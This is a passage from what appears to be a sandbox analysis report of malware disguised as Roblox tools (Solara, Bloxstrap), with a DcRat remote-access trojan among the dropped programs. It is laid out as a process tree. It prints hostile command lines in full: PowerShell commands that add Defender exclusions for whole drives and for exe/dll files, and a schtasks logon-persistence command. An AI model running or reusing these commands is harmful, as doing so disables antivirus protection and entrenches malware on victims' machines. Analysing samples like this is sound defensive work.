                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=1992 /prefetch:3
                                                                          6⤵
                                                                            PID:5964
                                                                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                            "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2500 /prefetch:8
                                                                            6⤵
                                                                              PID:5532
                                                                            • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                              "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
                                                                              6⤵
                                                                                PID:704
                                                                              • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                                "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2784 /prefetch:8
                                                                                6⤵
                                                                                  PID:2240
                                                                                • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                                  "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4580 /prefetch:8
                                                                                  6⤵
                                                                                    PID:5928
                                                                                  • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                                    "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=5108 /prefetch:8
                                                                                    6⤵
                                                                                      PID:5772
                                                                                    • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                                      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4864 /prefetch:2
                                                                                      6⤵
                                                                                        PID:3488
                                                                                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2032 /prefetch:8
                                                                                        6⤵
                                                                                          PID:11600
                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4792 /prefetch:8
                                                                                          6⤵
                                                                                            PID:12868
                                                                                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                                            "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4680 /prefetch:8
                                                                                            6⤵
                                                                                              PID:17008
                                                                                      • C:\Users\Admin\AppData\Local\Temp\solara.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\solara.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1592
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3488
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:704
                                                                                            • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
                                                                                              6⤵
                                                                                              • Modifies WinLogon for persistence
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Windows directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3876
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4536
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\conhost.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1480
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\csrss.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2332
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1084
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\lsass.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3872
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\database\conhost.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:952
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  8⤵
                                                                                                    PID:3488
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\SolaraBootstrapper.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3848
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\My Documents\sysmon.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:784
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1204
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Registry.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2904
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\csrss.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4952
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\csrss.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4008
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\sysmon.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5008
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-US\sihost.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1548
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4752
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4912
                                                                                                • C:\Windows\Migration\SolaraBootstrapper.exe
                                                                                                  "C:\Windows\Migration\SolaraBootstrapper.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1772
                                                                                      • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1852
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
                                                                                          3⤵
                                                                                            PID:1096
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
                                                                                              4⤵
                                                                                                PID:5608
                                                                                                • C:\winNet\ComContainerbrowserRefRuntime.exe
                                                                                                  "C:\winNet/ComContainerbrowserRefRuntime.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4296
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qNlp31Qh95.bat"
                                                                                                    6⤵
                                                                                                      PID:1220
                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                        chcp 65001
                                                                                                        7⤵
                                                                                                          PID:3916
                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                          ping -n 10 localhost
                                                                                                          7⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:4424
                                                                                                        • C:\Users\Default User\fontdrvhost.exe
                                                                                                          "C:\Users\Default User\fontdrvhost.exe"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                          PID:5296
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3560
                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                                                                                                  3⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5476
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                    4⤵
                                                                                                      PID:2324
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:5560
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3540
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                                                                                                      4⤵
                                                                                                        PID:3168
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                                                                                                          5⤵
                                                                                                          • DcRat
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:1472
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
                                                                                                        4⤵
                                                                                                          PID:5212
                                                                                                          • C:\Users\Admin\Bloxstrap.exe
                                                                                                            C:\Users\Admin\Bloxstrap.exe
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4276
                                                                                                            • C:\Windows\System32\conhost.exe
                                                                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
                                                                                                              6⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5944
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                                7⤵
                                                                                                                  PID:1784
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                                    8⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5680
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
